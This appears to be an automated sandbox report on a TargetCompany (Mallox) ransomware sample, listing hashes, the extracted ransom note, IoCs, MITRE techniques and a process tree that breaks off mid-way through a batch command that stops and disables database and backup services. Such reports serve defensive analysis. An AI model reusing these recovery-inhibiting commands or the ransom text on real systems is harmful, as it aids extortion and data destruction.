targetcompany | a7018ff4aaaaebda06615da54ab7d3dcfe06ffda501254eb9654aa27152629bb

Analysis

max time kernel
152s
max time network
150s
platform
windows10_x64
resource
win10-en-20211208
submitted
14-01-2022 06:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

InternalCrossContextDelega.exe
Size

429KB
MD5

22367699e131a9d98f842a1003fd193a
SHA1

c275084d65f845b4d957c05b874fade071193468
SHA256

a7018ff4aaaaebda06615da54ab7d3dcfe06ffda501254eb9654aa27152629bb
SHA512

26aedfe2eede18f72425f37d57fde838466345187f1df365528b0798a2f323badfbbb4f3b5571c4ea554cdb757dc0b7b2f7c87f5ae88c6e2cee41eaa92b6e828

Score

10^/10

targetcompany evasion ransomware

Malware Config

Extracted

Path

C:\$Recycle.Bin\RECOVERY INFORMATION.txt

Ransom Note

YOUR FILES ARE ENCRYPTED !!! TO DECRYPT, FOLLOW THE INSTRUCTIONS: To recover data you need decrypt tool. To get the decrypt tool you should: 1.In the letter include your personal ID! Send me this ID in your first email to me! 2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files! 3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! 4.We can decrypt few files in quality the evidence that we have the decoder. CONTACT US: [email protected] [email protected] YOUR PERSONAL ID: 8CC5CEF4A363 �

Emails

[email protected]

Signatures

TargetCompany
Ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
ransomware targetcompany

TargetCompany Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/740-128-0x000000000040AF56-mapping.dmp	family_targetcompany
behavioral2/memory/740-127-0x0000000000400000-0x0000000000428000-memory.dmp	family_targetcompany
behavioral2/memory/740-129-0x0000000000400000-0x0000000000428000-memory.dmp	family_targetcompany

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1812 bcdedit.exe
2232 bcdedit.exe

pid	process
1812	bcdedit.exe
2232	bcdedit.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

InternalCrossContextDelega.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\AssertStop.tiff => C:\Users\Admin\Pictures\AssertStop.tiff.mallox	InternalCrossContextDelega.exe
File opened for modification	C:\Users\Admin\Pictures\CompareAdd.tiff	InternalCrossContextDelega.exe
File renamed	C:\Users\Admin\Pictures\CompareAdd.tiff => C:\Users\Admin\Pictures\CompareAdd.tiff.mallox	InternalCrossContextDelega.exe
File renamed	C:\Users\Admin\Pictures\HideTrace.tif => C:\Users\Admin\Pictures\HideTrace.tif.mallox	InternalCrossContextDelega.exe
File renamed	C:\Users\Admin\Pictures\AddResolve.crw => C:\Users\Admin\Pictures\AddResolve.crw.mallox	InternalCrossContextDelega.exe
File renamed	C:\Users\Admin\Pictures\CompleteConvertFrom.raw => C:\Users\Admin\Pictures\CompleteConvertFrom.raw.mallox	InternalCrossContextDelega.exe
File renamed	C:\Users\Admin\Pictures\RequestEnable.tif => C:\Users\Admin\Pictures\RequestEnable.tif.mallox	InternalCrossContextDelega.exe
File opened for modification	C:\Users\Admin\Pictures\AssertStop.tiff	InternalCrossContextDelega.exe

Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

InternalCrossContextDelega.exe

description	ioc	process
File opened (read-only)	\??\Q:	InternalCrossContextDelega.exe
File opened (read-only)	\??\R:	InternalCrossContextDelega.exe
File opened (read-only)	\??\Z:	InternalCrossContextDelega.exe
File opened (read-only)	\??\K:	InternalCrossContextDelega.exe
File opened (read-only)	\??\J:	InternalCrossContextDelega.exe
File opened (read-only)	\??\L:	InternalCrossContextDelega.exe
File opened (read-only)	\??\N:	InternalCrossContextDelega.exe
File opened (read-only)	\??\S:	InternalCrossContextDelega.exe
File opened (read-only)	\??\T:	InternalCrossContextDelega.exe
File opened (read-only)	\??\W:	InternalCrossContextDelega.exe
File opened (read-only)	\??\E:	InternalCrossContextDelega.exe
File opened (read-only)	\??\F:	InternalCrossContextDelega.exe
File opened (read-only)	\??\H:	InternalCrossContextDelega.exe
File opened (read-only)	\??\Y:	InternalCrossContextDelega.exe
File opened (read-only)	\??\A:	InternalCrossContextDelega.exe
File opened (read-only)	\??\G:	InternalCrossContextDelega.exe
File opened (read-only)	\??\I:	InternalCrossContextDelega.exe
File opened (read-only)	\??\M:	InternalCrossContextDelega.exe
File opened (read-only)	\??\O:	InternalCrossContextDelega.exe
File opened (read-only)	\??\P:	InternalCrossContextDelega.exe
File opened (read-only)	\??\U:	InternalCrossContextDelega.exe
File opened (read-only)	\??\V:	InternalCrossContextDelega.exe
File opened (read-only)	\??\B:	InternalCrossContextDelega.exe
File opened (read-only)	\??\X:	InternalCrossContextDelega.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

InternalCrossContextDelega.exe

description pid process target process

PID 3800 set thread context of 740 3800 InternalCrossContextDelega.exe InternalCrossContextDelega.exe

description	pid	process	target process
PID 3800 set thread context of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe

Drops file in Program Files directory 64 IoCs

Processes:

InternalCrossContextDelega.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-pl.xrm-ms	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-pl.xrm-ms	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-pl.xrm-ms	InternalCrossContextDelega.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png	InternalCrossContextDelega.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\ui-strings.js	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations_retina.png	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-core-kit.xml_hidden	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcR_OEM_Perp-ul-phn.xrm-ms	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.SPREADSHEETCOMPARE.16.1033.hxn	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXC	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL093.XML	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms	InternalCrossContextDelega.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-ms	InternalCrossContextDelega.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\ui-strings.js	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons.png	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\WPGIMP32.FLT	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.png	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ppd.xrm-ms	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\ui-strings.js	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover.png	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\he-il\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-oob.xrm-ms	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons.png	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-sl\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODF	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\ui-strings.js	InternalCrossContextDelega.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFORMATION.txt	InternalCrossContextDelega.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\flat_officeFontsPreview.ttf	InternalCrossContextDelega.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

4548 net.exe
2156 net.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3764 vssadmin.exe

pid	process
4548	net.exe
2156	net.exe

pid	process
3764	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4664	taskkill.exe
4736
1820
5028
60	taskkill.exe
5044	taskkill.exe
980
288
1672
4928
4144	taskkill.exe
3996
5108
520
4916
2840
4668
5076
4828	taskkill.exe
2832	taskkill.exe
4068	taskkill.exe
4596	taskkill.exe
968
4876
4648
3052
4812	taskkill.exe
4776
1712
1076
4992
4772	taskkill.exe
4976	taskkill.exe
3864
1328
896
4492
2752	taskkill.exe
3060
64
1880
1020
1052
4860
1476
2204	taskkill.exe
3208
1944
304
1308
4100
4852	taskkill.exe
4768
4864
4140	taskkill.exe
1108	taskkill.exe
2368	taskkill.exe
4624	taskkill.exe
4100	taskkill.exe
4936	taskkill.exe
4392	taskkill.exe
4948
4852	taskkill.exe
4216	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

InternalCrossContextDelega.exeInternalCrossContextDelega.exe

pid	process
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
3800	InternalCrossContextDelega.exe
740	InternalCrossContextDelega.exe
740	InternalCrossContextDelega.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

InternalCrossContextDelega.exeInternalCrossContextDelega.exenet.exenet1.exesc.exetaskkill.exenet.exetaskkill.exenet1.exenet1.exenet.exesc.exesc.exetaskkill.exetaskkill.exenet.exenet1.exenet.exenet1.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exenet1.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exesc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3800	InternalCrossContextDelega.exe
Token: SeTakeOwnershipPrivilege	740	InternalCrossContextDelega.exe
Token: SeDebugPrivilege	740	InternalCrossContextDelega.exe
Token: SeBackupPrivilege	1772	net.exe
Token: SeRestorePrivilege	1772	net.exe
Token: SeAuditPrivilege	1772	net.exe
Token: SeDebugPrivilege	4012	net1.exe
Token: SeDebugPrivilege	2828	sc.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	308	net.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	2844	net1.exe
Token: SeDebugPrivilege	2704	net1.exe
Token: SeDebugPrivilege	1620	net.exe
Token: SeDebugPrivilege	3532	sc.exe
Token: SeDebugPrivilege	60	sc.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	4568	net.exe
Token: SeDebugPrivilege	4712	net1.exe
Token: SeDebugPrivilege	4696	net.exe
Token: SeDebugPrivilege	4828	net1.exe
Token: SeDebugPrivilege	4812	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	3512	taskkill.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeDebugPrivilege	4620	net.exe
Token: SeDebugPrivilege	5048	taskkill.exe
Token: SeDebugPrivilege	4112	net1.exe
Token: SeDebugPrivilege	372	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4944	taskkill.exe
Token: SeDebugPrivilege	312	net.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeDebugPrivilege	4972
Token: SeDebugPrivilege	4460	sc.exe
Token: SeDebugPrivilege	4432	taskkill.exe
Token: SeDebugPrivilege	4980
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	4512
Token: SeDebugPrivilege	4908
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeDebugPrivilege	4992	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeDebugPrivilege	4952	taskkill.exe
Token: SeDebugPrivilege	4724	taskkill.exe
Token: SeDebugPrivilege	4720	net.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	2232
Token: SeDebugPrivilege	5108
Token: SeDebugPrivilege	1476
Token: SeDebugPrivilege	372	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	4296
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	4536	taskkill.exe
Token: SeDebugPrivilege	4972
Token: SeDebugPrivilege	4800
Token: SeDebugPrivilege	4468	taskkill.exe
Token: SeDebugPrivilege	4904
Token: SeDebugPrivilege	2816
Token: SeDebugPrivilege	3644

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

InternalCrossContextDelega.execmd.exeInternalCrossContextDelega.execmd.execmd.execmd.execmd.exesc.execmd.exetaskkill.exe

description	pid	process	target process
PID 3800 wrote to memory of 2648	3800	InternalCrossContextDelega.exe	cmd.exe
PID 3800 wrote to memory of 2648	3800	InternalCrossContextDelega.exe	cmd.exe
PID 3800 wrote to memory of 2648	3800	InternalCrossContextDelega.exe	cmd.exe
PID 3800 wrote to memory of 1604	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1604	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1604	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1936	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1936	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1936	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1052	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1052	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 1052	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 716	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 716	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 716	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 3800 wrote to memory of 740	3800	InternalCrossContextDelega.exe	InternalCrossContextDelega.exe
PID 2648 wrote to memory of 3736	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 3736	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 3736	2648	cmd.exe	cmd.exe
PID 740 wrote to memory of 3764	740	InternalCrossContextDelega.exe	vssadmin.exe
PID 740 wrote to memory of 3764	740	InternalCrossContextDelega.exe	vssadmin.exe
PID 740 wrote to memory of 3268	740	InternalCrossContextDelega.exe	cmd.exe
PID 740 wrote to memory of 3268	740	InternalCrossContextDelega.exe	cmd.exe
PID 740 wrote to memory of 3032	740	InternalCrossContextDelega.exe	cmd.exe
PID 740 wrote to memory of 3032	740	InternalCrossContextDelega.exe	cmd.exe
PID 2648 wrote to memory of 2352	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 2352	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 2352	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 2060	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 2060	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 2060	2648	cmd.exe	cmd.exe
PID 3032 wrote to memory of 1812	3032	cmd.exe	net1.exe
PID 3032 wrote to memory of 1812	3032	cmd.exe	net1.exe
PID 3268 wrote to memory of 2232	3268	cmd.exe	taskkill.exe
PID 3268 wrote to memory of 2232	3268	cmd.exe	taskkill.exe
PID 3736 wrote to memory of 3260	3736	cmd.exe	sc.exe
PID 3736 wrote to memory of 3260	3736	cmd.exe	sc.exe
PID 3736 wrote to memory of 3260	3736	cmd.exe	sc.exe
PID 2060 wrote to memory of 4012	2060	cmd.exe	net1.exe
PID 2060 wrote to memory of 4012	2060	cmd.exe	net1.exe
PID 2060 wrote to memory of 4012	2060	cmd.exe	net1.exe
PID 2648 wrote to memory of 2948	2648	sc.exe	cmd.exe
PID 2648 wrote to memory of 2948	2648	sc.exe	cmd.exe
PID 2648 wrote to memory of 2948	2648	sc.exe	cmd.exe
PID 2352 wrote to memory of 2968	2352	cmd.exe	sc.exe
PID 2352 wrote to memory of 2968	2352	cmd.exe	sc.exe
PID 2352 wrote to memory of 2968	2352	cmd.exe	sc.exe
PID 3260 wrote to memory of 1088	3260	taskkill.exe	net1.exe
PID 3260 wrote to memory of 1088	3260	taskkill.exe	net1.exe
PID 3260 wrote to memory of 1088	3260	taskkill.exe	net1.exe
PID 2352 wrote to memory of 1496	2352	cmd.exe	net.exe
PID 2352 wrote to memory of 1496	2352	cmd.exe	net.exe
PID 2352 wrote to memory of 1496	2352	cmd.exe	net.exe
PID 2648 wrote to memory of 1836	2648	sc.exe	cmd.exe
PID 2648 wrote to memory of 1836	2648	sc.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe
"C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled & sc config "SQLTELEMETRY" start= disabled & sc config "MsDtsServer130" start= disabled & sc config "SSISTELEMETRY130" start= disabled & sc config 